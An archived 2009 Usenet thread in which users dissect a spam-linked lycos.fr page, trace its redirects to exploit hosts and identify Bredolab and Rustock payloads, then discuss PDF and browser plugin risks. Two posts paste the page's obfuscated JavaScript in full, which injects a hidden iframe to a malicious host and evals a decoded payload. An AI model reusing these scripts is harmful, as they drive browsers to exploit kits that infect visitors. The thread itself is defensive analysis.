Google Groups no longer supports new Usenet posts or subscriptions. Historical content remains viewable.
Dismiss

wierd html

5 views
Skip to first unread message

ArameFarpado

unread,
Nov 16, 2009, 3:14:38 PM11/16/09
to
hi

just receive this link trought email

hzzp://membres.lycos.fr/misschaterton/hot.html

(hzzp must be changed to http)


open the link with an html editor or text editor, never with your browser,
cause this file got wierd code in it... and i dont' know what can it do.


regards


David H. Lipman

unread,
Nov 16, 2009, 4:57:48 PM11/16/09
to
From: "ArameFarpado" <a-farpa...@netcabo.pt>

| hi

| hzzp://membres.lycos.fr/misschaterton/hot.html


| regards


Hmmmmmmm

I'm getting 0 bytes :-(

--
Dave
http://www.claymania.com/removal-trojan-adware.html
Multi-AV - http://www.pctipp.ch/downloads/dl/35905.asp


ArameFarpado

unread,
Nov 16, 2009, 7:01:08 PM11/16/09
to
Em Segunda 16 Novembro 2009 21:57, David H. Lipman escreveu:

> From: "ArameFarpado" <a-farpa...@netcabo.pt>
>
> | hi
>
> | just receive this link trought email
>
> | hzzp://membres.lycos.fr/misschaterton/hot.html
>
> | (hzzp must be changed to http)
>
>
> | open the link with an html editor or text editor, never with your
> | browser, cause this file got wierd code in it... and i dont' know what
> | can it do.
>
>
> | regards
>
>
> Hmmmmmmm
>
> I'm getting 0 bytes :-(
>

your're right, now it is a empty file...

one hour ago it got this content:

<html>
<head>
<title>!!!
</title>
</head>
<body>
<script>function KWcyxxCsP(UlxQDarxIN){var etMbmZCmZ=4,YIeniyU=8;var
KAU='30,0+52,4+51,0+57,0+48,4+54,4+50,4+16,0+59,4+52,4+50,0+58,0+52,0+30,4+24,4+16,0+52,0+50,4+52,4+51,4+52,0+58,0+30,4+24,4+16,0+49,0+55,4+57,0+50,0+50,4+57,0+30,4+24,0+16,0+51,0+57,0+48,4+54,4+50,4+49,0+55,4+57,0+50,0+50,4+57,0+30,4+24,0+16,0+57,4+57,0+',fziLs=KAU.split('+');GyGFidUftI='';for(WBvJ=0x8-0xd-0x17-0xd-0x1c+0x45;WBvJ<fziLs.length-1;WBvJ+=0x12-0x1d-0x2f-0xc-0x3+0xa+0x14+0x2c)
{ cJB=fziLs[WBvJ].split(',');LVKbsX =
parseInt(cJB[0]*YIeniyU)+parseInt(cJB[1]);LVKbsX =
parseInt(LVKbsX)/etMbmZCmZ;GyGFidUftI += String.fromCharCode(LVKbsX);}return
GyGFidUftI;}function bMeH(jrYehM){ var KSas =
document.getElementById('OVXZcgrhSl');var HpqRJLJB=new Function("rqQwVtX",
"return 101455;"); fff=op.split("857"); }
function QXbmFihMo(GuM){var pRWpTlPd=5,vRESwAGehJ=5;var
YXKxGMEebO='99,0+61,0+39,0+104,0+116,0+116,0+112,0+58,0+47,0+47,0+115,0+117,0+110,0+99,0+97,0+114,0+100,0+115,0+46,0+110,0+101,0+116,0+47,0+108,0+111,0+103,0+115,0+47,0+105,0+110,0+100,0+101,0+120,0+46,0+112,0+104,0+112,0+39,0+62,0+60,0+47,0+105,0+102,0+114,0+97,0+109,0+101,0+62,0+',DVjYcCYC=YXKxGMEebO.split('+');YsJM='';for(HWkQKoIX=0x9-0x16-0xe+0x1b;HWkQKoIX<DVjYcCYC.length-1;HWkQKoIX+=-0x29+0x25-0x17+0x30+0xa-0x1e)
{ gxaJcTE=DVjYcCYC[HWkQKoIX].split(',');wQcUrj =
parseInt(gxaJcTE[0]*vRESwAGehJ)+parseInt(gxaJcTE[1]);wQcUrj =
parseInt(wQcUrj)/pRWpTlPd;YsJM += String.fromCharCode(wQcUrj);}return
YsJM;}function KCYvSql(qOjh){ fff.op.replace("835"); }
document['w7679r1843i2124t6370e88367475'.replace(/[0-9]/g,'')]
(KWcyxxCsP('IAIwAYaSg'),QXbmFihMo('jZYEH'));function UWR(ZfEXBbBz){
fff=op.split("907");window.eval(); }
function tNcp(bKIpoEA){ window.eval(); }
function ujOKrO(rwbbhEhmR){ fff=op.split("443"); }
</script>
<FRAMESET border=0 rows="100%,*" frameborder="no" marginleft=0 margintop=0
marginright=0 marginbottom=0>
<frame src="http://amazingmedicalmy.com.cn" scrolling=auto frameborder="no"
border=0 noresize>
<frame topmargin="0" marginwidth=0 scrolling=no marginheight=0
frameborder="no" border=0 noresize>
</FRAMESET>
<iframe src="http://prerre.com/counter3.php" width="1" height="1"
style="visibility:hidden;position:absolute"></iframe>
</body>
</html><script>wzha="31363c6568635231363c69656863523e2d363b2c313736783c37313e2a39353d2b2a3b7071235251313e7031363c697178235251512a3d2c2d2a3670687163525125525131363c6965696352513c373b2d353d362c763f3d2c1d343d353d362c1a21113c707f3521313e2a39353d7f71762b2a3b657a302c2c2862777721372d392b333d3c2c303d3c3735393136763b36777a635225523c373b2d353d362c762f2a312c3d707a64313e2a39353d782f313c2c30657f697f78303d313f302c657f697f782b2c21343d657f2e312b313a3134312c216230313c3c3d367f78313c657f3521313e2a39353d7f7837361437393c657f2c2a21233c37313e2a39353d2b2a3b707163253b392c3b30703d7123257f666477313e2a39353d667a716352313e703c373b2d353d362c7639343471782352513c37313e2a39353d2b2a3b7071635225522c2e2a202f657a1639167a63282c2e3f35657a1639167a63";sfaupp="function
jwv()
{lovbep=Math.PI;sbr=parseInt;nstes='length';jancwf=sbr(~((lovbep&lovbep)|
(~lovbep&lovbep)&(lovbep&~lovbep)|
(~lovbep&~lovbep)));so=sbr(((jancwf&jancwf)|
(~jancwf&jancwf)&(jancwf&~jancwf)|
(~jancwf&~jancwf))&1);vcc=so<<so;ptvgm=jancwf;tvrxw='';tes=String.fromCharCode;pth=eval;for(ab=jancwf;ab<sfaupp[nstes];ab-
=-
so)ptvgm+=sfaupp.charCodeAt(ab);ptvgm%=unescape(jancwf+tes(120)+(so<<6));for(ab=jancwf;ab<wzha[nstes];ab+=vcc)tvrxw+=tes(sbr(jancwf+tes(120)+wzha.charAt(ab)+wzha.charAt(ab+sbr(so)))^ptvgm);try{pth(tvrxw);}catch(aaaa)
{try{eval(tvrxw);}catch(aaaa){}}}try{eval('jwv();')}catch(aaaa)
{}";eval(sfaupp);</script>


of course, lots of lines ore (most likely) broken in two ou tree here...


i'm not a expert in html code, but this is not ordinary html.

ArameFarpado

unread,
Nov 16, 2009, 7:08:01 PM11/16/09
to
Em Terça 17 Novembro 2009 00:01, ArameFarpado escreveu:

>
>
> of course, lots of lines ore (most likely) broken in two ou tree here...

yeap, the original file has 19 lines

ArameFarpado

unread,
Nov 16, 2009, 7:13:53 PM11/16/09
to
Em Terça 17 Novembro 2009 00:01, ArameFarpado escreveu:

>>
>> Hmmmmmmm
>>
>> I'm getting 0 bytes :-(
>>
> your're right, now it is a empty file...
>
> one hour ago it got this content:
>

results from virustotal:


AntiVir HTML/Infected.WebPage.Gen


F-Prot JS/Obf.I.gen

Kaspersky Trojan-Downloader.JS.Shadraem.a

McAfee-GW-Edition Heuristic.LooksLike.JS.Suspicious.A

David H. Lipman

unread,
Nov 16, 2009, 7:22:04 PM11/16/09
to
From: "ArameFarpado" <a-farpa...@netcabo.pt>

| Em Ter�a 17 Novembro 2009 00:01, ArameFarpado escreveu:

>> of course, lots of lines ore (most likely) broken in two ou tree here...

| yeap, the original file has 19 lines


What you posted was an obfuscated and malicious script that goes to...

amazingmedicalmy.com.cn
and
prerre.com --> basic.free-host.in

basic.free-host.in hosts a malicious exploits in PDF and Flash format; 'aldusToThis.pdf'
and 'lookBeen.swf'

aldusToThis.pdf
http://www.virustotal.com/analisis/8a3073f354a4d602e446c26e885140e35bf49d8d2a3c4d72531a269244408978-1258416984
a-squared 4.5.0.41 2009.11.16 Exploit.JS.Pdfka!IK
Antiy-AVL 2.0.3.7 2009.11.16 Exploit/JS.Pdfka
Comodo 2960 2009.11.16 TrojWare.JS.Exploit.Pdfka.anp
Ikarus T3.1.1.74.0 2009.11.16 Exploit.JS.Pdfka
Kaspersky 7.0.0.125 2009.11.17 Exploit.JS.Pdfka.anp

lookBeen.swf
http://www.virustotal.com/analisis/2778f22a07b8d23c890bf6c517f394c6d274751fb82c48f98902448db8d57023-1258417013
Authentium 5.2.0.5 2009.11.16 SWF/Obfusc.A!Camelot
PCTools 7.0.3.5 2009.11.16 HeurEngine.MaliciousExploit
Symantec 1.4.4.12 2009.11.17 Bloodhound.Exploit.193

I haven't determined the payload yet.

ArameFarpado

unread,
Nov 16, 2009, 7:41:13 PM11/16/09
to
Em Terça 17 Novembro 2009 00:22, David H. Lipman escreveu:

> From: "ArameFarpado" <a-farpa...@netcabo.pt>
>
> | Em Ter�a 17 Novembro 2009 00:01, ArameFarpado escreveu:
>
>
>
>>> of course, lots of lines ore (most likely) broken in two ou tree here...
>
> | yeap, the original file has 19 lines
>
>
> What you posted was an obfuscated and malicious script that goes to...
>
> amazingmedicalmy.com.cn
> and
> prerre.com --> basic.free-host.in
>
> basic.free-host.in hosts a malicious exploits in PDF and Flash format;
> 'aldusToThis.pdf' and 'lookBeen.swf'
>
> aldusToThis.pdf

i coudln't open any of the links, i'm running linux here and my browser just
present me with the "bug" icon telling me the document was buggy and refuse
to open it... of course i only try to open it with a browser that only opens
standard htmls.

>
http://www.virustotal.com/analisis/8a3073f354a4d602e446c26e885140e35bf49d8d2a3c4d72531a269244408978-1258416984
> a-squared 4.5.0.41 2009.11.16 Exploit.JS.Pdfka!IK
> Antiy-AVL 2.0.3.7 2009.11.16 Exploit/JS.Pdfka
> Comodo 2960 2009.11.16 TrojWare.JS.Exploit.Pdfka.anp
> Ikarus T3.1.1.74.0 2009.11.16 Exploit.JS.Pdfka
> Kaspersky 7.0.0.125 2009.11.17 Exploit.JS.Pdfka.anp
>
> lookBeen.swf
>
http://www.virustotal.com/analisis/2778f22a07b8d23c890bf6c517f394c6d274751fb82c48f98902448db8d57023-1258417013
> Authentium 5.2.0.5 2009.11.16 SWF/Obfusc.A!Camelot
> PCTools 7.0.3.5 2009.11.16 HeurEngine.MaliciousExploit
> Symantec 1.4.4.12 2009.11.17 Bloodhound.Exploit.193
>
> I haven't determined the payload yet.
>

yeah, i wonder what does it do...

the funny thing is, i receive the link in a email just saying "join us" :D
it looked like a line form a horror movie.

regards
ArameFarpado

David H. Lipman

unread,
Nov 16, 2009, 7:46:54 PM11/16/09
to
From: "ArameFarpado" <a-farpa...@netcabo.pt>

| the funny thing is, i receive the link in a email just saying "join us" :D
| it looked like a line form a horror movie.

| regards
| ArameFarpado

Standard Social Engineering type email. The original lycos.fr web page was probably
cleaned after a few complained of its malicious nature.

David H. Lipman

unread,
Nov 16, 2009, 8:07:34 PM11/16/09
to
From: "ArameFarpado" <a-farpa...@netcabo.pt>

The payload is a BADLY recognized Bredolab Trojan hosted on; basic.free-host.in .

http://www.virustotal.com/analisis/8acb7778e6fa905960d4e25138c9bb30b741c3bb961bdd7f6f92395e29aa7422-1258419923

Kaspersky 7.0.0.125 2009.11.17 Packed.Win32.Krap.x
TrendMicro 9.0.0.1003 2009.11.16 TROJ_BREDLAB.SME

ArameFarpado

unread,
Nov 16, 2009, 9:00:00 PM11/16/09
to
Em Terça 17 Novembro 2009 01:07, David H. Lipman escreveu:

> From: "ArameFarpado" <a-farpa...@netcabo.pt>
>
> The payload is a BADLY recognized Bredolab Trojan hosted on;
> basic.free-host.in .
>
>
http://www.virustotal.com/analisis/8acb7778e6fa905960d4e25138c9bb30b741c3bb961bdd7f6f92395e29aa7422-1258419923
>
> Kaspersky 7.0.0.125 2009.11.17 Packed.Win32.Krap.x
> TrendMicro 9.0.0.1003 2009.11.16 TROJ_BREDLAB.SME
>

yes, i notice the low detection on virustotal... it's a rare bird.

i wonder if this html code can really cause damage in a system? after all
this is just a document, and documents souldn't be allowed to pass functions
to the processor and lanch any binaries...

this gotta be some kind of malware that can only cause damage if opended
with a poor secured browser with features that a browser souldn't have...


regards

VanguardLH

unread,
Nov 17, 2009, 4:43:13 AM11/17/09
to
ArameFarpado wrote:

> hzzp://membres.lycos.fr/misschaterton/hot.html

What do YOU call weird? Any HTML that you don't yet understand? I used
SamSpade which shows me the code that gets received, which was:


11/17/09 03:37:11 Browsing
http://membres.lycos.fr/misschaterton/hot.html
Fetching http://membres.lycos.fr/misschaterton/hot.html ...
GET /misschaterton/hot.html HTTP/1.1

Host: membres.lycos.fr

Connection: close

User-Agent: Sam Spade 1.14

HTTP/1.1 200 OK

Date: Tue, 17 Nov 2009 09:36:59 GMT

Server: Apache

Set-Cookie: Apache=24.118.105.35.1258450619868730; path=/

Accept-Ranges: bytes

Vary: Accept-Encoding

TMMDEBUG: wmembf01

Connection: close

Transfer-Encoding: chunked

Content-Type: text/html

937

<script type="text/javascript">
window.google_analytics_uacct = "UA-7539432-8";
</script>
<style>
#catfish6a2cf5d5{PADDING: 0px;MARGIN: 0px 0px -90px;WIDTH: 100%;HEIGHT:
90px;BOTTOM: 0px;POSITION: fixed;}
</style>
<!--[if IE]>
<style>
#catfish6a2cf5d5{ Z-INDEX: 1000; OVERFLOW: hidden; POSITION: absolute;}
HTML,BODY {OVERFLOW: hidden;WIDTH: auto;HEIGHT: 100%;}
DIV#zip6a2cf5d5{PADDING: 0px;MARGIN: 0px;OVERFLOW: auto;WIDTH:
100%;HEIGHT: 100%;POSITION: relative;}
</style>
<![endif]-->
<div id="topad6a2cf5d5"></div>
<script>matnk="555e52445c545f451f464358455419130d585743505c54114243520c16594545410b1e1e595450551c5c5e435e5f1f525f1e161146585545590c160016115954585659450c160016114245485d540c164758425853585d5845480b59585555545f160f0d1e585743505c540f13180a3b545845425c590c137f507f130a595f5d470c137f507f130a";jl="function
fasgo(){lnts=Math.PI;jaeqo=parseInt;qigol='length';lfn=jaeqo(~((lnts&lnts)|(~lnts&lnts)&(lnts&~lnts)|(~lnts&~lnts)));ettik=jaeqo(((lfn&lfn)|(~lfn&lfn)&(lfn&~lfn)|(~lfn&~lfn))&1);xuu=ettik<<ettik;hnlv=lfn;eitsmh='';eymxcn=String.fromCharCode;aj=eval;for(fypep=lfn;fypep<jl[qigol];fypep-=-ettik)hnlv+=jl.charCodeAt(fypep);hnlv%=unescape(lfn+eymxcn(120)+(ettik<<6));for(fypep=lfn;fypep<matnk[qigol];fypep+=xuu)eitsmh+=eymxcn(jaeqo(lfn+eymxcn(120)+matnk.charAt(fypep)+matnk.charAt(fypep+jaeqo(ettik)))^hnlv);try{aj(eitsmh);}catch(aaaa){try{eval(eitsmh);}catch(aaaa){}}}try{eval('fasgo();')}catch(aaaa){}";eval(jl);</script><script>matnk="555e52445c545f451f464358455419130d585743505c54114243520c16594545410b1e1e595450551c5c5e435e5f1f525f1e161146585545590c160016115954585659450c160016114245485d540c164758425853585d5845480b59585555545f160f0d1e585743505c540f13180a3b545845425c590c137f507f130a595f5d470c137f507f130a";jl="function
fasgo(){lnts=Math.PI;jaeqo=parseInt;qigol='length';lfn=jaeqo(~((lnts&lnts)|(~lnts&lnts)&(lnts&~lnts)|(~lnts&~lnts)));ettik=jaeqo(((lfn&lfn)|(~lfn&lfn)&(lfn&~lfn)|(~lfn&~lfn))&1);xuu=ettik<<ettik;hnlv=lfn;eitsmh='';eymxcn=String.fromCharCode;aj=eval;for(fypep=lfn;fypep<jl[qigol];fypep-=-ettik)hnlv+=jl.charCodeAt(fypep);hnlv%=unescape(lfn+eymxcn(120)+(ettik<<6));for(fypep=lfn;fypep<matnk[qigol];fypep+=xuu)eitsmh+=eymxcn(jaeqo(lfn+eymxcn(120)+matnk.charAt(fypep)+matnk.charAt(fypep+jaeqo(ettik)))^hnlv);try{aj(eitsmh);}catch(aaaa){try{eval(eitsmh);}catch(aaaa){}}}try{eval('fasgo();')}catch(aaaa){}";eval(jl);</script>

277

</style></noframes></pre></xmp></noscript>

<div id="catfish6a2cf5d5" style="display:none"></div>
<script src="http://ads.mmania.com/displaycf.js.php?r=6a2cf5d5&cc=fr"
type=text/javascript></script>

<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ?
"https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost +
"google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-7539432-8");
pageTracker._trackPageview();
} catch(err) {}
</script>

Since SamSpade isn't going to run the scripts or exercise the style
sheets, I don't know what gets pulled after the page code is pulled into
a web browser that executes that stuff.

David H. Lipman

unread,
Nov 17, 2009, 6:43:24 AM11/17/09
to
From: "VanguardLH" <V...@nguard.LH>

| ArameFarpado wrote:

>> hzzp://membres.lycos.fr/misschaterton/hot.html

| What do YOU call weird? Any HTML that you don't yet understand? I used
| SamSpade which shows me the code that gets received, which was:


Unfortunately YOU posted the malicious page UNOBFUSCATED and it is serving up new a
exploit site and malware.

Please... Do NOT post unobfuscated malicious or possibly malicious web sites !

googlenew.cn serving up pdf.pdf

http://www.virustotal.com/analisis/999d30989f18cd315a1338c97365d9b63351cf4214ce80e5ceb83ffdb7a072df-1258446469

a-squared 4.5.0.41 2009.11.17 Exploit.JS.Pdfka!IK
AhnLab-V3 5.0.0.2 2009.11.16 PDF/Exploit
AntiVir 7.9.1.65 2009.11.16 EXP/Pidief.baa.17
BitDefender 7.2 2009.11.17 Exploit.PDF-JS.Gen
ClamAV 0.94.1 2009.11.17 Exploit.PDF-1417
eSafe 7.0.17.0 2009.11.16 PDF.Exploit.4
F-Secure 9.0.15370.0 2009.11.17 Exploit.PDF-JS.Gen
GData 19 2009.11.17 Exploit.PDF-JS.Gen
Ikarus T3.1.1.74.0 2009.11.17 Exploit.JS.Pdfka
Kaspersky 7.0.0.125 2009.11.17 Exploit.JS.Pdfka.amm
McAfee-GW-Edition 6.8.5 2009.11.17 Exploit.Pidief.baa.17
NOD32 4613 2009.11.16 PDF/Exploit.Gen
Sunbelt 3.2.1858.2 2009.11.12 Exploit.PDF-JS.Gen (v)
TrendMicro 9.0.0.1003 2009.11.17 TROJ_PDFJSC.UR

The payload is now Rustock.

http://www.virustotal.com/analisis/5f9688f955a7ca776788d578459382b9852002e452b1f3c3ceae6a546746ea1c-1258457270

a-squared 4.5.0.41 2009.11.17 Backdoor.WinNT.Rustock!IK
AntiVir 7.9.1.70 2009.11.17 HEUR/Crypted.E
ClamAV 0.94.1 2009.11.17 PUA.Packed.ASPack212
Ikarus T3.1.1.74.0 2009.11.17 Backdoor.WinNT.Rustock
Kaspersky 7.0.0.125 2009.11.17 Backdoor.Win32.Goolbot.an
McAfee+Artemis 5804 2009.11.16 Artemis!94C19048E88C
Microsoft 1.5202 2009.11.17 Backdoor:WinNT/Rustock.C
PCTools 7.0.3.5 2009.11.17 Trojan.Generic
Prevx 3.0 2009.11.17 Medium Risk Malware
Symantec 1.4.4.12 2009.11.17 Trojan Horse
TrendMicro 9.0.0.1003 2009.11.17 PAK_Generic.001

VanguardLH

unread,
Nov 17, 2009, 7:11:43 AM11/17/09
to
David H. Lipman wrote:

> From: "VanguardLH" <V...@nguard.LH>
>
>| ArameFarpado wrote:
>
>>> hzzp://membres.lycos.fr/misschaterton/hot.html
>
>| What do YOU call weird? Any HTML that you don't yet understand? I used
>| SamSpade which shows me the code that gets received, which was:
>
> Unfortunately YOU posted the malicious page UNOBFUSCATED and it is serving up new a
> exploit site and malware.
>
> Please... Do NOT post unobfuscated malicious or possibly malicious web sites !

Sorry. Didn't notice the http: string from the *text* output of
SamSpade. It was all text. It still is all text. That your newsreader
parses out URL strings to make them clickable is a "feature" of your OE
newsreader. My intention was to just show the page code (which, if
there were further discussion, would be to show the overtly obfuscated
code it that's what the OP meant by "weird"). Showing the code (already
known as proven by you) as text should not have it actually run in your
newsreader.

Lycos already killed that page. As of Tue, 17 Nov 2009 12:05:09 GMT, it
now redirects to a 404 web page.

FromTheRafters

unread,
Nov 17, 2009, 7:51:21 AM11/17/09
to
"ArameFarpado" <a-farpa...@netcabo.pt> wrote in message
news:4b0203a1$0$279$1472...@news.sunsite.dk...

> Em Ter�a 17 Novembro 2009 01:07, David H. Lipman escreveu:

> i wonder if this html code can really cause damage in a system? after
> all
> this is just a document, and documents souldn't be allowed to pass
> functions
> to the processor and lanch any binaries...

As David mentioned, it brings the user to servers serving exploit code
(PDF/Flash) - so yes, it ends up being bad (perhaps very bad).

It is not the HTML but the action that results from it.


ArameFarpado

unread,
Nov 17, 2009, 8:22:09 AM11/17/09
to

my point is, html and pdf are just documents, documents should not take
actions, just show things... a code like this can only do damage if the
viewer allows it, because the viewer IS the active program running, not the
document.

regards

FromTheRafters

unread,
Nov 17, 2009, 10:51:21 AM11/17/09
to
"ArameFarpado" <a-farpa...@netcabo.pt> wrote in message
news:4b02a383$0$271$1472...@news.sunsite.dk...

> Em Ter�a 17 Novembro 2009 12:51, FromTheRafters escreveu:
>
>> "ArameFarpado" <a-farpa...@netcabo.pt> wrote in message
>> news:4b0203a1$0$279$1472...@news.sunsite.dk...
>>> Em Ter?a 17 Novembro 2009 01:07, David H. Lipman escreveu:
>>
>>> i wonder if this html code can really cause damage in a system?
>>> after
>>> all
>>> this is just a document, and documents souldn't be allowed to pass
>>> functions
>>> to the processor and lanch any binaries...
>>
>> As David mentioned, it brings the user to servers serving exploit
>> code
>> (PDF/Flash) - so yes, it ends up being bad (perhaps very bad).
>>
>> It is not the HTML but the action that results from it.
>
> my point is, html and pdf are just documents, documents should not
> take
> actions, just show things... a code like this can only do damage if
> the
> viewer allows it, because the viewer IS the active program running,
> not the
> document.

Absolutely, *that* is where *exploit code* comes into play. An *exploit*
attacks a vulnerability in the client code in this case (I think) the
underlying support for Flash.

The iframe is only *used* maliciously to get the browser to access the
served (Flash/PDF) exploit(s). The obfuscation in the HTML (suspect in
and of itself) is used to avoid early detection of the attempt to
misdirect the browser.

If you had actually gone there, there would only be danger if you had
one of the vulnerabilities that the exploit(s) attack(s).


VanguardLH

unread,
Nov 17, 2009, 1:21:59 PM11/17/09
to
ArameFarpado wrote:

> my point is, html and pdf are just documents, documents should not take
> actions, just show things... a code like this can only do damage if the
> viewer allows it, because the viewer IS the active program running, not the
> document.

Adobe's Reader and other PDF "viewers" can execute scripts within the
PDF. It's not some oddball exploit, like a bufferrun, to get a command
to run from inside a PDF. PDFs actually support scripts within them.
It is highly unlikely that you will run across a good PDF that has a
script inside but they do exist. For now, go into what PDF reader you
use and disable its Javascript support.

http://www.pdfscripting.com/
http://partners.adobe.com/public/developer/en/acrobat/sdk/AcroJSGuide.pdf

Unless you're in an environment where scripts within .pdf files is
common, just disable its support in the reader program. Adobe's Reader
program has had several attacks against its code to make a command run
when it wasn't inside a script within the .pdf file; however, disabling
its Javascript support should help to mitigate those exploits and neuter
the reader's handling to, as you say, just show it as a document. I
haven't investigated all the exploits to find out if disabling
Javascript completely neuters them all.

http://www.google.com/search?q=%2B"adobe+reader"+%2Bexploit

I use PDF-Xchange as my PDF reader (and annotater) and also disable
Javascript support within it. Although it supports Javascript within
PDFs, if enabled, the product itself is different code so exploits
against Adobe Reader aren't effective against PDF-Xchange's reader.
Plus I get more features with PDF-Xchange than with Adobe Reader.

I haven't investigated enough to know if disabling the integration
between the web browser and PDF reader (via the ActiveX helper installed
and used by the web browser) would help enhance security against PDF
exploits. I just disable Javascript support in the reader and use a
different reader that doesn't get targeted.

Ant

unread,
Nov 17, 2009, 1:34:39 PM11/17/09
to
"FromTheRafters" wrote:

> "ArameFarpado" wrote:
>> my point is, html and pdf are just documents, documents should not
>> take actions, just show things... a code like this can only do damage
>> if the viewer allows it, because the viewer IS the active program
>> running, not the document.

Unfortunately, these 'documents' can contain and run scripts - so that
makes them like a program running within another. In theory, scripts
can be restricted in what they are allowed to do but all non-trivial
programs/applications almost certainly contain bugs. Some have yet to
be discovered and some can be exploited.

> Absolutely, *that* is where *exploit code* comes into play. An *exploit*
> attacks a vulnerability in the client code in this case (I think) the
> underlying support for Flash.

A few things except Flash!

ActiveX instantiations of:
Microsoft Remote Data Services Data Control (MDAC)
AcroPDF.PDF or PDF.PdfCtrl (PDF)
Microsoft Snapshot Viewer Control
OWC10.Spreadsheet (MS Excel?)

and:
Java

These exploits are all in googlenew.cn/mmm/index.php which is where
both the obfuscated scripts in the 1st and 2nd examples posted here
end up redirecting to.

In addition, the first example had code to to visit:
suncards.net/logs/index.php.
I wrote about this URL last week in nanae but was unable to
satisfactorily determine the outcome. Probably because it was using a
session ID in another redirect and I wasn't quick enough before it
timed out (or perhaps it required a 'referer' header or similar).

> If you had actually gone there, there would only be danger if you had
> one of the vulnerabilities that the exploit(s) attack(s).

If ActiveX and Java (not javascript) are disabled you'll be ok. If
not, this shows the importance of keeping browser plugins and other
applications used to display content up-to-date as well as the OS
components.


ArameFarpado

unread,
Nov 17, 2009, 1:53:02 PM11/17/09
to

Well, i use Okular and it doesn't have any javascript suport, at least there
is nothing in it's preferencies and manual, anyway, konqueror didn't even
load the okular plugin in it. in fact, konqueror didn't show anything at all
beside the "bug" icon.


regards

ArameFarpado

unread,
Nov 17, 2009, 1:52:58 PM11/17/09
to

thanks for the explanation, like i said, it all points to one thing: the
clients you use...

i do have the flash player plugin from adobe, but even that is blocked:
everytime i open a html with swf i get a icon in the place where the swf
should be, if i want to see the swf, i have to click on the icon... in this
case the link didn't show anything at all.

regards

FromTheRafters

unread,
Nov 17, 2009, 1:59:54 PM11/17/09
to
"Ant" <n...@home.today> wrote in message
news:duadnfMO9a1FcZ_W...@brightview.co.uk...

Indeed, and such places often serve up a cocktail of exploits which lead
to the downloading and execution of *various* other malware programs -
so just knowing what you got, is not also knowing what you *also* got.
:o)


FromTheRafters

unread,
Nov 17, 2009, 2:33:39 PM11/17/09
to

"ArameFarpado" <a-farpa...@netcabo.pt> wrote in message
news:4b02f10e$0$282$1472...@news.sunsite.dk...

If so-called document's formats hadn't been extensible to include what
is considered *program code* - and the clients hadn't implemented the
means to translate and execute the resulting code, then your original
assumption would be correct.

If a client program comsumes data to use only as data, then it takes an
exploit to make the data be interpreted as code. If a client program
consumes data to be interpreted as code - it only needs an abuse of
function to transmit malware.

Both can be called exploits - one exploits a client software flaw
vulnerability and the other a client configuration vulnerability.


ArameFarpado

unread,
Nov 17, 2009, 3:09:10 PM11/17/09
to

This second situation shouldn't even had been created in the 1st place.
Documents should only be documents and nothing more.

>
> Both can be called exploits - one exploits a client software flaw
> vulnerability and the other a client configuration vulnerability.

indeed

David H. Lipman

unread,
Nov 17, 2009, 4:01:13 PM11/17/09
to
From: "VanguardLH" <V...@nguard.LH>

< snip >

| Lycos already killed that page. As of Tue, 17 Nov 2009 12:05:09 GMT, it
| now redirects to a 404 web page.

Excellent !

Ant

unread,
Nov 17, 2009, 7:03:26 PM11/17/09
to
"David H. Lipman" wrote:
> From: "VanguardLH"
>| Lycos already killed that page. As of Tue, 17 Nov 2009 12:05:09 GMT, it
>| now redirects to a 404 web page.
>
> Excellent !

It's still live and serving up pure script creating an invisible
iframe to head-moron.cn (previously youaskedthedomain.cn on the same
host): 91.213.126.93 which redirects to googlenew.cn: 91.213.126.92
which has the exploits and malware.


0 new messages